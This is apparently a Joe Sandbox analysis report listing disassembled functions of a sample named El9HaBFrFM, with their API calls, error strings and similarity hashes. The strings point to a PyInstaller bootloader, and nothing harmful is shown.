Function 00007FF6BA3A1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BA3A7F90: _fread_nolock.LIBCMT ref: 00007FF6BA3A803A

_fread_nolock.LIBCMT ref: 00007FF6BA3A1A1B

Part of subcall function 00007FF6BA3A2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6BA3A1B6A), ref: 00007FF6BA3A295E

Strings

malloc, xrefs: 00007FF6BA3A1B22
Could not allocate buffer for TOC!, xrefs: 00007FF6BA3A1B1B
calloc, xrefs: 00007FF6BA3A1A68
Failed to seek to cookie position!, xrefs: 00007FF6BA3A19EE
Could not read full TOC!, xrefs: 00007FF6BA3A1B55
Failed to read cookie!, xrefs: 00007FF6BA3A1A2B
Error on file., xrefs: 00007FF6BA3A1B8D
fseek, xrefs: 00007FF6BA3A19F5
MEI, xrefs: 00007FF6BA3A1991
fread, xrefs: 00007FF6BA3A1A32, 00007FF6BA3A1B5C
Could not allocate memory for archive structure!, xrefs: 00007FF6BA3A1A61

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
Instruction ID: 0f13b9b46475006238ca34a1eb1ae64f015f556f94893fcc7f2a56475438f961
Opcode Fuzzy Hash: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
Instruction Fuzzy Hash: 0A819471A0CA9686EF60DB2CD4402BD63A2EF44784F444576EF8DC7796EE3CE5858740

Function 00007FF6BA3A1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6BA3A16DA
malloc, xrefs: 00007FF6BA3A1749
fwrite, xrefs: 00007FF6BA3A17D1
fopen, xrefs: 00007FF6BA3A1663
Failed to create symbolic link %s!, xrefs: 00007FF6BA3A1622
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6BA3A17CA
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6BA3A17DF
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6BA3A1742
fseek, xrefs: 00007FF6BA3A16E1
Failed to extract %s: failed to open target file!, xrefs: 00007FF6BA3A165C
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6BA3A16A2
fread, xrefs: 00007FF6BA3A17E6

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
Instruction ID: dd905067492a88bd85427228c1cedd38a612935110789a2ef753ec50ea3772f5
Opcode Fuzzy Hash: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
Instruction Fuzzy Hash: 6451B021B08B6792EE109B59D8401BD6392BF80794F8446B2EF0CC77E6EF3CE5958300

Function 00007FF6BA3A8660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A8704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A870A
CreateDirectoryW.KERNELBASE(?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A874C

Part of subcall function 00007FF6BA3A8830: GetEnvironmentVariableW.KERNEL32(00007FF6BA3A388E), ref: 00007FF6BA3A8867
Part of subcall function 00007FF6BA3A8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6BA3A8889

Part of subcall function 00007FF6BA3B8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B8251

Part of subcall function 00007FF6BA3A2810: MessageBoxW.USER32 ref: 00007FF6BA3A28EA

Strings

LOADER: failed to set the TMP environment variable., xrefs: 00007FF6BA3A86DC
TMP, xrefs: 00007FF6BA3A86C2
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6BA3A877E
TMP, xrefs: 00007FF6BA3A869C, 00007FF6BA3A87A3
_MEI%d, xrefs: 00007FF6BA3A8712

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction ID: 61b2a6dd6bf71dfa59745e520b0f1c7072ed433f21a655892ed23786ae15a234
Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction Fuzzy Hash: 97417021A19A6244FE50AB6DE8552BD2296AF847C0F8441B2EF0DC77DAEE3CE605C340

Function 00007FF6BA3A1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6BA3A12BA
malloc, xrefs: 00007FF6BA3A12C1, 00007FF6BA3A12F6
1.3.1, xrefs: 00007FF6BA3A1249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6BA3A12EF
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6BA3A1276
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6BA3A141E

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
Instruction ID: e7e218bea623bde61708f427b7fcd7b4368cbd96e1b0d49f00024d598f8a602f
Opcode Fuzzy Hash: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
Instruction Fuzzy Hash: 5551E322A08A6681EE60AF19E4503BE6292FF85794F844276EF4DC7BD5EF3CE541C700

Function 00007FF6BA3BED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6BA3BF0AA,?,?,-00000018,00007FF6BA3BAD53,?,?,?,00007FF6BA3BAC4A,?,?,?,00007FF6BA3B5F3E), ref: 00007FF6BA3BEE8C
GetProcAddress.KERNEL32(?,?,?,00007FF6BA3BF0AA,?,?,-00000018,00007FF6BA3BAD53,?,?,?,00007FF6BA3BAC4A,?,?,?,00007FF6BA3B5F3E), ref: 00007FF6BA3BEE98

Strings

api-ms-, xrefs: 00007FF6BA3BEDD6
ext-ms-, xrefs: 00007FF6BA3BEDE9

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 2401af859a48643a1efddb18fd409e2d207b16f6385c28e8799082d3e391b860
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: B241C422B19B1291EA16CB1EAC005796396BF49B90F988679DF1EC7784EF3CE445D300

Function 00007FF6BA3A36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6BA3A3804), ref: 00007FF6BA3A36E1
GetLastError.KERNEL32(?,00007FF6BA3A3804), ref: 00007FF6BA3A36EB

Part of subcall function 00007FF6BA3A2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2C9E
Part of subcall function 00007FF6BA3A2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2D63
Part of subcall function 00007FF6BA3A2C50: MessageBoxW.USER32 ref: 00007FF6BA3A2D99

Strings

Failed to obtain executable path., xrefs: 00007FF6BA3A36F3
GetModuleFileNameW, xrefs: 00007FF6BA3A36FA
Failed to resolve full path to executable %ls., xrefs: 00007FF6BA3A3739
\\?\, xrefs: 00007FF6BA3A375A
Failed to convert executable path to UTF-8., xrefs: 00007FF6BA3A3790

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: 4fd1f0c6bb6e1feb03afd2ae079dcc5f2a362c457a86b5d1be680f9e0324aeb2
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: 12218161F1866291FE209B28EC513BE6256BF88394F8442B2EF5EC65E5FE2DE505C700

Function 00007FF6BA3BBA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3BBE89

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
Instruction ID: 498042b8bade30e16a632e5d5190c2e48e6397d1dbcd995b40cfaaf51afd2612
Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
Instruction Fuzzy Hash: 83C1BE22A0CF8692EA609F1995402BD7B96FB81B80FD543B5EF4EC7791CE7CE8458700

Function 00007FF6BA3A8570 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6BA3A8590
OpenProcessToken.ADVAPI32 ref: 00007FF6BA3A85A3
GetTokenInformation.KERNELBASE ref: 00007FF6BA3A85C8
GetLastError.KERNEL32 ref: 00007FF6BA3A85D2
GetTokenInformation.KERNELBASE ref: 00007FF6BA3A8612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6BA3A862E
CloseHandle.KERNEL32 ref: 00007FF6BA3A8646

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction ID: a1a13a9c21bb540d1afd7dfa216c21187366486237ffc4c511fbdf12f5af6df1
Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction Fuzzy Hash: 2F212C31A0CB5242EA509B59F94422EA7A5FF857A0F504275EF6DC3BE8EF7CD4458B00

Function 00007FF6BA3A90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BA3A8570: GetCurrentProcess.KERNEL32 ref: 00007FF6BA3A8590
Part of subcall function 00007FF6BA3A8570: OpenProcessToken.ADVAPI32 ref: 00007FF6BA3A85A3
Part of subcall function 00007FF6BA3A8570: GetTokenInformation.KERNELBASE ref: 00007FF6BA3A85C8
Part of subcall function 00007FF6BA3A8570: GetLastError.KERNEL32 ref: 00007FF6BA3A85D2
Part of subcall function 00007FF6BA3A8570: GetTokenInformation.KERNELBASE ref: 00007FF6BA3A8612
Part of subcall function 00007FF6BA3A8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6BA3A862E
Part of subcall function 00007FF6BA3A8570: CloseHandle.KERNEL32 ref: 00007FF6BA3A8646

LocalFree.KERNEL32(?,00007FF6BA3A3C55), ref: 00007FF6BA3A916C
LocalFree.KERNEL32(?,00007FF6BA3A3C55), ref: 00007FF6BA3A9175

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6BA3A9142
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6BA3A9183
D:(A;;FA;;;%s), xrefs: 00007FF6BA3A9157
S-1-3-4, xrefs: 00007FF6BA3A9121

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: bce30d106d1aea433b574043196e7eeaa4ab3af65bd301622a4049b2291cccd5
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: 0C213231A08B5282FA549B68E8152EE63A6FF84780F4444B5EF4DD3B96DF3CD945C740

Function 00007FF6BA3BCF60 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BA3BCF4B), ref: 00007FF6BA3BD07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BA3BCF4B), ref: 00007FF6BA3BD107

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: ec586eb8924886d0c864ad17c5384adf69ef9668bb76eb356cde9310a985e9e8
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: AE91B432F18A5289F7A09F6D94402BD6BA2AB44BC8F9442B5DF0ED7A94DF3CD442C700

Function 00007FF6BA3B5628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B5655
CreateFileW.KERNELBASE ref: 00007FF6BA3B5694
CloseHandle.KERNEL32 ref: 00007FF6BA3B56C9

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction ID: 3bcf7c6ed53aca5c20e386785a37e803a8de415a3a2e6e4b6f39c6d92f09cd9e
Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction Fuzzy Hash: 16419F22E18B8283E7509B2895103697261FB947A4F509375EF9DC3AD2EF7CA5E08700

Function 00007FF6BA3ACC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BA3ACE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6BA3ACE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6BA3ACC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF6BA3ACCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6BA3ACD21

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 335ff39f3f99ffed34338f133bd4613ad11c62b4299f03c747fc64c91a1b93d7
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: B0313B21E0C66785FE54ABADD4623BD67839F41384F4845B4EF0ECB2E3DE6CA8058350

Function 00007FF6BA3B9A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6BA3B9A2C), ref: 00007FF6BA3B9A41
TerminateProcess.KERNEL32(?,?,?,00007FF6BA3B9A2C), ref: 00007FF6BA3B9A4C
ExitProcess.KERNEL32 ref: 00007FF6BA3B9A5B

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction ID: 40a0152e4c595804a861dfe87c172e011b79baa8aeede409de63d3ac8da93285
Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction Fuzzy Hash: 1FD09210B18B1642EB183F785CA907C236A6F88B02F5525B8DE0BC7393EE2DA88D4300

Function 00007FF6BA3B013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B0180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B0277

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

